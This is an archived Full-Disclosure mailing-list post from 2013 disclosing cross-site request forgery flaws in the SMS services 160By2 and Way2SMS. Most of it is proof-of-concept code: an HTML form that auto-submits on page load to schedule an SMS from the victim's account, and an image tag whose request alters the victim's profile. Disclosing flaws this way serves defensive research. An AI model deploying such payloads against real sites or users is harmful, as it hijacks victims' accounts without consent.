lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 4 Jan 2013 06:09:13 +0530
From: eHackingNews <breakthesecurity.com@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: CSRF Vulnerability in 160By2 allows hacker to
	send sms from victim account

Cross Site Request Forgery (CSRF) Vulnerability in Top Online-based SMS
sending service websites 160By2.com and Way2SMS.com.

The Security flaw in 160By2 allows hackers to send sms from victim account.
This Security flaw in Way2Sms hacker to change the name, dob and other
details of the victim with a crafted-request.

The PoC for the 160by2:
<html>
<body onload="document.smsalerts.submit();">

<form name="smsalerts" id="smsalerts" method="post" action="
http://www.160by2.com/InsertSMSAlerts">
    <input type="hidden" name="hidd_array" id="hidd_array">
    <input type="hidden" name="hidd_sno" id="hidd_sno">
    <input type="hidden" name="hidd_mno" id="hidd_mno" value="">
    <input type="hidden" name="hidd_edit_type" id="hidd_edit_type">
    <input type="hidden" name="alerttype" value="Birthday"/>
   <input type="hidden" name="cmd_gender" value="Him"/>
   <input type="hidden" name="cmb_month" value="01"/>
   <input type="hidden" name="cmb_day" value="01"/>
 <input type="hidden" name="cmb_year" value="2013"/>
 <input type="hidden" name="txthour"  value="20"/>
  <input type="hidden" name="txtminute" value="27"/>
  <input name="textfield4" type="hidden"  value="Your_Mobile_Number">
  <input name="txt_sendsms_count" type="hidden"  value="126 characters
left/">
<input type="hidden" name="textarea" value="BreakTheSec Inside"/>
<input type="hidden" name="totCount" value=""/>
<input type="hidden" name="pageNo" value=""/>
</body>
</html>

POC for the Way2SMS:
<img src="
http://site4.way2sms.com/Settings?HiddenAction=general&txtSName=Neo&txt_date=01-01-1905&SProfddl=1&SCityddl=84
"/>

http://www.ehackingnews.com/2013/01/csrf-vulnerability-in-160by2-way2sms.html

-- 

Sabari Selvan, founder of E Hacking News
Twitter : @EHackerNews
Facebook : fb.me/EHackerNews

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ